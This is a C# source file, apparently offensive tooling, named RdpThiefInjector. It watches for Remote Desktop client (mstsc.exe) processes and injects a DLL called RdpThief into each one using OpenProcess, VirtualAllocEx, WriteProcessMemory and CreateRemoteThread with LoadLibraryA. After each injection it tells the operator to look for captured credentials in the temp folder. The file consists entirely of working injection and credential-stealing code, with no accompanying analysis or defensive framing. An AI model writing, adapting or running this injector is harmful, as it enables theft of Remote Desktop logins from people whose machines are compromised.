Copy using System ;
using System . Threading ;
using System . Diagnostics ;
using System . Collections . Generic ;
using System . Runtime . InteropServices ;
using System . Text ;
namespace RdpThiefInjector
{
class Program
{
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr OpenProcess ( uint processAccess , bool bInheritHandle , int processId);
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[ DllImport ( "kernel32.dll" )]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[ DllImport ( "kernel32" , CharSet = CharSet . Ansi , ExactSpelling = true , SetLastError = true )]
static extern IntPtr GetProcAddress ( IntPtr hModule , string procName);
[ DllImport ( "kernel32.dll" , CharSet = CharSet . Auto )]
public static extern IntPtr GetModuleHandle ( string lpModuleName);
static void Main ( string [] args)
{
string dllName = @"C:\Temp\RdpThief.dll" ;
HashSet < int > PIDs = new HashSet < int >();
Console . WriteLine ( "[*] Joined the hunt for mstsc.exe processes..." );
while ( true )
{
Process [] mstscProc = Process . GetProcessesByName ( "mstsc" );
if ( mstscProc . Length > 0 )
{
for ( int i = 0 ; i < mstscProc . Length ; i ++ )
{
int processId = mstscProc [i]. Id ;
if ( ! PIDs . Contains (processId))
{
Console . WriteLine ( $"[+] Detected non-hooked process with PID={processId}" );
IntPtr hProcess = OpenProcess ( 0x001F0FFF , false , processId);
IntPtr dllAddress = VirtualAllocEx (hProcess , IntPtr . Zero , 0x1000 , 0x3000 , 0x40 );
IntPtr outSize;
bool res = WriteProcessMemory(hProcess, dllAddress, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize);
if (res)
{
Console . WriteLine ( "[+] WriteProcessMemory succeeded!" );
}
else
{
Console . WriteLine ( "[-] WriteProcessMemory failed :(" );
}
IntPtr loadLibraryAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLibraryAddress, dllAddress, 0, IntPtr.Zero);
if (hThread != null )
{
Console . WriteLine ( "[+] CreateRemoteThread succeeded!" );
Console.WriteLine($"[*] Process {processId} is now hooked, look for creds in \"{System.IO.Path.GetTempPath()}\"");
PIDs . Add (processId);
}
else
{
Console . WriteLine ( "[-] CreateRemoteThread failed :(" );
}
}
}
}
Thread . Sleep ( 5000 );
}
}
}
} 